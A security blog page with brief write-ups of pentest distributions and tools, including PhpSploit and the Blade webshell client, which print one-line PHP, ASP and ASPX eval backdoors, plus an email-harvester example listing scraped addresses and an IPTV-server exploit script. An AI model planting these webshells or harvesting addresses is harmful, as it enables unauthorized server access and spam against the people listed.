OffSec Blog

SECURITY EDUCATION, PRIVACY GUIDANCE, THREAT AWARENESS, OPEN SOURCE TOOLS, RESEARCH NOTES, AND RESPONSIBLE TECHNOLOGY CONTENT

  • Penetration Testing Distribution - BackBox

    BackBox is a penetration test and security assessment oriented Ubuntu-based Linux distribution providing a network and informatic systems analysis toolkit. It includes a complete set of tools required for ethical hacking and security testing...

  • Pentest Distro Linux - Weakerth4n

    Weakerth4n is a penetration testing distribution which is built from Debian Squeeze.For the desktop environment it uses Fluxbox...

  • The Amnesic Incognito Live System - Tails

    Tails is a live system that aims to preserve your privacy and anonymity. It helps you to use the Internet anonymously and circumvent censorship...

  • Penetration Testing Distribution - BlackArch

    BlackArch is a penetration testing distribution based on Arch Linux that provides a large amount of cyber security tools. It is an open-source distro created specially for penetration testers and security researchers...

  • The Best Penetration Testing Distribution - Kali Linux

    Kali Linux is a Debian-based distribution for digital forensics and penetration testing, developed and maintained by Offensive Security. Mati Aharoni and Devon Kearns rewrote BackTrack...

  • Friendly OS designed for Pentesting - ParrotOS

    Parrot Security OS is a cloud friendly operating system designed for Pentesting, Computer Forensic, Reverse engineering, Hacking, Cloud pentesting...

Wednesday, January 6, 2016

Kali NetHunter 3.0 - Android Mobile Penetration Testing Platform

      , , , , ,       No comments    


What’s New in Kali NetHunter 3.0


    NetHunter Android Application Rewrite


The NetHunter Android application has been totally redone and has become much more “application centric”. Many new features and attacks have been added, not to mention a whole bunch of community-driven bug fixes. The NetHunter application has finally reached maturity and is now a really viable tool that helps manage complex attacks. In addition, the application now allows you to manage your Kali chroot independently, including rebuilding and deleting the chroot as needed. You can also choose to install individual metapackages in your chroot, although the default selected kali-nethunter metapackage should include all the bare necessities.

    Android Lollipop and Marshmallow Support


Yes, you heard right. NetHunter now supports Marshmallow (Android AOSP 6.x) on applicable devices – although we’re not necessarily fans of the “latest is best” philosophy. Our favourite device continues to be the OnePlus One phone due to the combined benefits of size, CPU/RAM resources, as well as Y-Cable charging support.

    New Build Scripts, Easier Integration for New Devices


Our rewrite also included the code that generates the images, completely porting it to Python and optimizing the build time significantly. The build process can now build small NetHunter images (~70MB) that do not include a built-in Kali chroot – allowing you do download a chroot later via the Android application.

We’ve also made it much easier to build ports for new devices that NetHunter can run on and we’ve already seen a couple of interesting PRs regarding Galaxy device support…


    Fabulous NetHunter Documentation


We might be somewhat biased regarding our documentation, and perhaps it’s not “fabulous” but just “good”… but still, it’s definitely much better than it was before and can be found in the form of the NetHunter Github Wiki. We’ve included topics such as downloading, building and installing NetHunter, as well as a quick overview of each of the NetHunter Attacks and Features.

    NetHunter Linux Root Toolkit Installer


We’ve got a new official NetHunter installer that runs natively on Linux or OSX. The installer is made from a set of Bash scripts which you can use to unlock, flash to stock and install the NetHunter image to supported OnePlus One or Nexus devices. Please welcome the NetHunter LRT, created by jmingov.


Share:

ParanoicScan - Vulnerability Scanner

      , , ,       No comments    


Old Options

Google & Bing Scanner that also scan :

  • XSS
  • SQL GET / POST
  • SQL GET
  • SQL GET + Admin
  • Directory listing
  • MSSQL
  • Jet Database
  • Oracle
  • LFI
  • RFI
  • Full Source Discloure
  • HTTP Information
  • SQLi Scanner
  • Bypass Admin
  • Exploit FSD Manager
  • Paths Finder
  • IP Locate
  • Crack MD5
  • Panel Finder
  • Console

Fixes

[+] Refresh of existing pages to crack md5
[+] Error scanner fsd
[+] Http error scanner scan
[+] Spaces between text too annoying
[+] Added array to bypass
[+] Failed to read from file

New options

[+] Generate all logs in a html file
[+] Incorporates random and new useragent
[+] Multi encoder / decoder :

  • Ascii
  • Hex
  • Url
  • Bin To Text & Text To Bin
[+] PortScanner
[+] HTTP FingerPrinting
[+] CSRF Tool
[+] Scan XSS
[+] Generator for XSS Bypass
[+] Generator links to tiny url
[+] Finder and downloader exploits on Exploit-DB
[+] Mysql Manager
[+] Tools LFI

An video


Share:

IPTV Brute-Force - Search And Brute Force Illegal IPTV Server

      , , , ,       No comments    



This program is just a demonstration. DO NOT USE IT FOR PERSONAL purpose

What is this?

IPTV is a simple python script that let you crawl the search engines in order to fetch those sites that stream illegal tv programs.

This script leverage the fact the a lot of those sites use the same CMS to create the web application and sharing the service, behind a CMS there's always some exploits. We are using one simple exploit to grab and crawl the site's url and use for our purpose.

 Ethical Dilemma

Even though those services are illegal, stealing from a thief is still stealing.

External dependencies

If you want to use the iptv_gui version you need to install PyQt first
  • On Linux you can simply search it from your preferred package manager, for example on Ubuntu/Debian sudo apt-get install pyqt4-dev-tools
  • On Mac OSX you can use brew to install it brew install sip && brew install pyqt
  • On Windows yu can download the official .exe from the PyQt site.

How to use the CLI version
  • Clone the repository git clone https://github.com/Pinperepette/IPTV
  • cd into iptv
  • run pip install -r requirements.txt in order to get the full dependencies
  • run python iptv_cli.py
  • Use the application menu to do stuff

How to use the GUI version
  • Clone the repository git clone git@github.com:Pinperepette/IPTV.git
  • cd into iptv
  • run pip install -r requirements.txt in order to get the full dependencies
  • run python iptv_gui.py
  • you can see an example of the GUI in the image below


Compatibility

This program work on Window, Linux, Mac OSX and BSD. The only requirement is python, better if python 3!


Share:

Sawef - Send Attack Web Forms

      , , , , , ,       No comments    


SAWEF - Send Attack Web Forms

DESCRIPTION 
The purpose of this tool is to be a Swiss army knife 
for anyone who works with HTTP, so far it she is basic, 
bringing only some of the few features that want her to have, 
but we can already see in this tool:

- Email Crawler in sites
- Crawler forms on the page
- Crawler links on web pages
- Sending POST and GET
- Support for USER-AGENT
- Support for THREADS
- Support for COOKIES

REQUERIMENTS 
 ----------------------------------------------------------
Import:
threading
time
argparse
requests
json
re
BeautifulSoup

permission          Reading & Writing
User                root privilege, or is in the sudoers group
Operating system    LINUX
Python              2.7
 ----------------------------------------------------------

 INSTALL 
git clone http://github.com/danilovazb/SAWEF

sudo apt-get install python-bs4 python-requests

HELP 
usage: tool [-h] --url http://url.com/
            [--user_agent '{"User-agent": "Mozilla/5.0 Windows; U; Windows NT 5.1; hu-HU; rv:1.7.8 Gecko/20050511 Firefox/1.0.4"}"]
            [--threads 10] [--data '{"data":"value", "data1":"value"}']
            [--qtd 5] [--method post|get]
            [--referer '{"referer": "http://url.com"}']
            [--response status_code|headers|encoding|html|form|links|emails]
            [--cookies '{"__utmz":"176859643.1432554849.1.1.utmcsr=direct|utmccn=direct|utmcmd=none"}']
            [--modulo crawler]

optional arguments:
  -h, --help        show this help message and exit
  --url http://url.com/
                    URL to request
  --user_agent '{"User-agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; hu-HU; rv:1.7.8) Gecko/20050511 Firefox/1.0.4"}"
                    For a longer list, visit:
                    http://www.useragentstring.com/pages/useragentstring.php
  --threads 10      Threads
  --data '{"data":"value", "data1":"value"}'
                    Data to be transmitted by post
  --qtd 5           Quantity requests
  --method post|get
                    Method sends requests
  --referer '{"referer": "http://url.com"}'
                    Referer
  --response status_code|headers|encoding|html|form|links|emails
                    Status return
  --cookies '{"__utmz":"176859643.1432554849.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)"}'
                    Cookies from site
  --modulo crawler  Carrega modulo adcional


EXAMPLE 
*Send 1 SMS anonymous to POST [in BR]:
-------------
$:> python sawef.py --url "https://smsgenial.com.br/forms_teste/enviar.php" --data '{"celular":"(11) XXXX-XXXXX","mensagem":"Teste","Testar":"Enviar"}' --threads 10 --qtd 1 --user_agent '{"User-agent":"Mozilla/5.0 Windows; U; Windows NT 5.1; hu-HU; rv:1.7.8) Gecko/20050511 Firefox/1.0.4"}'

*List Form attributes:
-------------
$:> python sawef.py --url "https://smsgenial.com.br/" --method post --response form
OUTPUT:

--------------------------------
NOME_FORM[None]
URL[http://paineldeenvios.com/painel/app/login/login.php]
METHOD[post]

email:Digite Seu Login        (text)
passwd:Senha        (password)
Entrar:Entrar        (submit)

--------------------------------
NOME_FORM[form1]
URL[/forms_teste/criaruser.php]
METHOD[post]

action:criarconta        (hidden)
nome:<NONE>        (text)
celular:<NONE>        (text)
email:<NONE>        (text)
Testar:Criar        (submit)
Testar:Enviar        (hidden)

--------------------------------
NOME_FORM[None]
URL[/forms_teste/enviar.php]
METHOD[post]

celular:<NONE>        (text)
Testar:Enviar        (submit)

* Get email web pages
$:> python sawef.py --url "http://pastebin.com/ajaYnLYc" --response emails
[...]
[+] EMAIL = manothradevi@yahoo.com
[+] EMAIL = fantaghiroaziera@yahoo.com
[+] EMAIL = naqibjohari@yahoo.com
[+] EMAIL = azliey3036@yahoo.com
[+] EMAIL = azlin_4531@yahoo.com.my
[+] EMAIL = urshawal96@yahoo.com
[+] EMAIL = weeta_aida88@yahoo.com.my
FOUND = 3065

* Get links on web pages
$:> python sawef.py --url "http://terra.com.br" --response links
[...]
[+] LINK = http://uol.com.br/https://pagseguro.uol.com.br/vender
[+] LINK = http://www.uolhost.com.br/registro-de-dominio.html
[+] LINK = http://noticias.uol.com.br/arquivohome/
[+] LINK = http://noticias.uol.com.br/erratas/
[+] LINK = http://uol.com.br/#
[+] FOUND = 360

* Crawling site

$:> python sawef.py --url "http://www.100security.com.br" --modulo "crawler"
Emails: 

[+] marcos@aulasdeti.com.br
[+] marcos@100security.com.br
[+] danilovazb@gmail.com
[+] cve@mitre.org
[+] cve-id-change@mitre.org
[+] devon@digitalsanctuary.com
[+] g5382139@trbvm.com
[+] editor@www.com
[+] support@senderbase.org
[+] 0x0ptim0us@gmail.com
[+] ramiro.caire@gmail.com
[+] fgmassa@vanguardsec.com
[+] crime.internet@dpf.gov.br
[+] cgpre@dpf.gov.br
[+] dpat.dcor@dpf.gov.br
[+] dicof.cgcsp@dpf.gov.br
[+] coain.coger@dpf.gov.br
[+] dprev.cgpfaz@dpf.gov.br
[+] dicat@pcdf.df.gov.br
[+] nureccel@pc.es.gov.br
[+] devir@pc.ms.gov.br
[+] comunicacao@policiacivil.pa.gov.br
[+] cibercrimes@pc.pr.gov.br
[+] policiac@fisepe.pe.gov.br
[+] drci@policiacivil.rj.gov.br
[+] drci@pcerj.rj.gov.br
[+] drci@pc.rs.gov.br
[+] 4dp.dig.deic@policiacivil.sp.gov.br
[+] marcos@marcoshenrique.com
[+] contato@fabricadeaplicativos.com.br
[+] email@mail.com.br
[+] lcm@lcm.com.br
[+] luizwt at gmail.com
[+] luizwt@gmail.com
[+] geoff@deconcept.com
[+] revista@espiritolivre.org
[+] email@email.com
[+] s**********s@gmail.com
[+] //iriok@hotmail.com



Share:

Vuvuzela - Private Messaging System That Hides Metadata

      , , , , ,       No comments    

Vuvuzela is a messaging system that protects the privacy of message contents and message metadata. Users communicating through Vuvuzela do not reveal who they are talking to, even in the presence of powerful nation-state adversaries. Our SOSP 2015 paper explains the system, its threat model, performance, limitations, and more. Our SOSP 2015 slides give a more graphical overview of the system. 

Vuvuzela is the first system that provides strong metadata privacy while scaling to millions of users. Previous systems that hide metadata using Tor (such as Pond ) are prone to traffic analysis attacks. Systems that encrypt metadata using techniques like DC-nets and PIR don't scale beyond thousands of users.

Vuvuzela uses efficient cryptography ( NaCl ) to hide as much metadata as possible and adds noise to metadata that can't be encrypted efficiently. This approach provides less privacy than encrypting all of the metadata, but it enables Vuvuzela to support millions of users. Nonetheless, Vuvuzela adds enough noise to thwart adversaries like the NSA and guarantees differential privacy for users' metadata.

Screenshots

A conversation in the Vuvuzela client

In practice, the message latency would be around 20s to 40s, depending on security parameters and the number of users connected to the system.

Noise generated by the Vuvuzela servers

Vuvuzela is unable to encrypt two kinds of metadata: the number of idle users (connected users without a conversation partner) and the number of active users (users engaged in a conversation). Without noise, a sophisticated adversary could use this metadata to learn who is talking to who. However, the Vuvuzela servers generate noise that perturbs this metadata so that it is difficult to exploit.

Usage
Follow these steps to run the Vuvuzela system locally using the provided sample configs.
  1. Install Vuvuzela (assuming GOPATH=~/go , requires Go 1.4 or later): 
    $ go get github.com/davidlazar/vuvuzela/...
    The remaining steps assume PATH contains ~/go/bin and that the current working directory is ~/go/src/github.com/davidlazar/vuvuzela .
  2. Start the last Vuvuzela server: 
    $ vuvuzela-server -conf confs/local-last.conf
  3. Start the middle server (in a new shell): 
    $ vuvuzela-server -conf confs/local-middle.conf
  4. Start the first server (in a new shell): 
    $ vuvuzela-server -conf confs/local-first.conf
  5. Start the entry server (in a new shell): 
    $ vuvuzela-entry-server -wait 1s
  6. Run the Vuvuzela client: 
    $ vuvuzela-client -conf confs/alice.conf
The client supports these commands:
  • /dial <user> to dial another user
  • /talk <user> to start a conversation
  • /talk <yourself> to end a conversation

Deployment considerations
This Vuvuzela implementation is not ready for wide-use deployment. In particular, we haven't yet implemented these crucial components:
  • Public Key Infrastructure : Vuvuzela assumes the existence of a PKI in which users can privately learn each others public keys. This implementation uses pki.conf as a placeholder until we integrate a real PKI.
  • CDN to distribute dialing dead drops :Vuvuzela's dialing protocol (used to initiate conversations) uses a lot of server bandwidth. To make dialing practical, Vuvuzela should use a CDN or BitTorrent to distribute the dialing dead drops.
There is a lot more interesting work to do. See the issue tracker for more information.


Share:

Phpsploit - Stealth Post-Exploitation Framework

      , , , ,       No comments    


PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable to maintain access to a compromised web server for privilege escalation purposes.

Overview

The obfuscated communication is accomplished using HTTP headers under standard client requests and web server's relative responses, tunneled through a tiny polymorphic backdoor : 
<? @eval($_SERVER['HTTP_PHPSPL01T']) ?>

Features

  • Efficient : More than 20 plugins to automate post-exploitation tasks
    • Run commands and browse filesystem, bypassing PHP security restrictions
    • Upload/Download files between client and target
    • Edit remote files through local text editor
    • Run SQL console on target system
    • Spawn reverse TCP shells
  • Stealth : The framework is made by paranoids, for paranoids
    • Nearly invisible by log analysis and NIDS signature detection
    • Safe-mode and common PHP security restrictions bypass
    • Communications are hidden in HTTP Headers
    • Loaded payloads are obfuscated to bypass NIDS
    • http/https/socks4/socks5 Proxy support
  • Convenient : A robust interface with many crucial features
    • Cross-platform on both the client and the server.
    • Powerful interface with completion and multi-command support
    • Session saving/loading feature, with persistent history
    • Multi-request support for large payloads (such as uploads)
    • Provides a powerful, highly configurable settings engine
    • Each setting, such as user-agent has a polymorphic mode
    • Customisable environment variables for plugin interaction
    • Provides a complete plugin development API

Supported platforms

  • GNU/Linux
  • Mac OS X
  • Windows (experimental)


Share:

Blade - A Webshell Connection Tool With Customized WAF Bypass Payloads

      , , ,       No comments    


Blade is a webshell connection tool based on console, currently under development and aims to be a choice of replacement of Chooper (中国菜刀). Chooper is a very cool webshell client with widly typies of server side scripts supported, but Chooper can only work on Windows opreation system, so this is the motivation of create another "Chooper" supporting Windows, Linux & Mac OS X. Blade is based on Python, so it allows users to modify the webshell connection payloads so that Blade can bypass some specified WAF which Chooper can not.

Major functions
Manage a web server with only one-line code on it, just like: <?php @eval($_REQUEST["cmd"]); ?>
PHP, ASP, ASPX & JSP supported.
Terminal Console provided.
File management & Dadabase management.

Features
Cross-plaform supported (Python needed)
Customizable WAF bypass payloads
Compatible with Chooper's server side scripts

Server side scripts examples
PHP:<?php @eval($_REQUEST["cmd"]); ?>
ASP: <%eval request("cmd")%>
ASPX:<%@ Page Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%>

Usage
Get a shell:
python blade.py -u http://localhost/shell.php -s php -p cmd --shell
Download a file:
python blade.py -u http://localhost/shell.php -s php -p cmd --pull remote_path local_path
Upload a file:
python blade.py -u http://localhost/shell.php -s php -p cmd --push local_path remote_path

Current issues
Server side scripts supporting is not completed, currently only support PHP and ASP
Database management function is not completed, so can not connect databases


Share:

Sublist3R - Fast Subdomains Enumeration Tool For Penetration Testers

      , , ,       No comments    


Sublist3r is python tool that is designed to enumerate subdomains of websites using search engines. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Sublist3r currently supports the following search engines: Google, Yahoo, Bing, Baidu, and Ask. More search engines may be added in the future. Sublist3r also gathers subdomains using Netcraft and DNSdumpster.

subbrute was integrated with Sublist3r to increase the possibility of finding more subdomains using bruteforce with an improved wordlist. The credit goes to TheRook who is the author of subbrute.

Installation 
git clone https://github.com/aboul3la/Sublist3r.git

Recommended Python Version:
The recommended python version to use is 2.7.x on any platform.
Other python versions maybe not supported at the moment.

Dependencies:

Requests library ( http://docs.python-requests.org/en/latest/ )
  • Install for Ubuntu/Debian: 
sudo apt-get install python-requests
  • Install for Centos/Redhat: 
sudo yum install python-requests
  • Install using pip: 
sudo pip install requests

dnspython library ( http://www.dnspython.org/ )
  • Install for Ubuntu/Debian: 
sudo apt-get install python-dnspython
  • Install using pip: 
sudo pip install dnspython

argparse library
  • Install for Ubuntu/Debian: 
sudo apt-get install python-argparse
  • Install for Centos/Redhat: 
sudo yum install python-argparse
  • Install using pip: 
sudo pip install argparse

Usage
Short Form Long Form Description
-d --domain Domain name to enumerate subdomains of
-b --bruteforce Enable the subbrute bruteforce module
-v --verbose Enable Verbosity and display results in realtime
-t --threads Number of threads to use for subbrute bruteforce
-o --output Save the results to text file
-h --help show the help message and exit

Examples
  • To list all the basic options and switches use -h switch:
python sublist3r.py -h
  • To enumerate subdomains of specific domain:
python sublist3r.py -d example.com
  • To enumerate subdomains of specific domain and show results in realtime:
python sublist3r.py -v -d example.com
  • To enumerate subdomains and use the subbrute bruteforce module:
python sublist3r.py -b -d example.com


Share:

Nipe - Script To Redirect All Traffic From The Machine To The Tor Network

      , ,       No comments    

Script to redirect all the traffic from the machine to the Tor network. 
    [+] AUTOR:        Vinicius Gouvea
    [+] EMAIL:        vini@inploit.com
    [+] BLOG:         https://medium.com/viniciusgouvea
    [+] GITHUB:       https://github.com/HeitorG
    [+] FACEBOOK:     https://fb.com/viniciushgouvea


 Installing: 
git clone https://github.com/HeitorG/nipe
cd nipe
cpan install  strict warnings Switch

Commands: 
COMMAND          FUNCTION
install          For install.
start            To start
stop             To stop

 Tested on:
  • Ubuntu 14.10 and 15.04
  • Busen Labs Hydrogen
  • Debian Jessie 8.1 and Wheezy 7.9
  • Lubuntu 15.04
  • Xubuntu 15.04
  • LionSec 3.0

Share:
Established in 2015. Offensive Sec Blog has been sharing security research, hacking tools, threat intelligence, and offensive security content since 2015.
Copyright © OffSec Blog | Powered by OffensiveSec
Design by OffSec | Built for the security community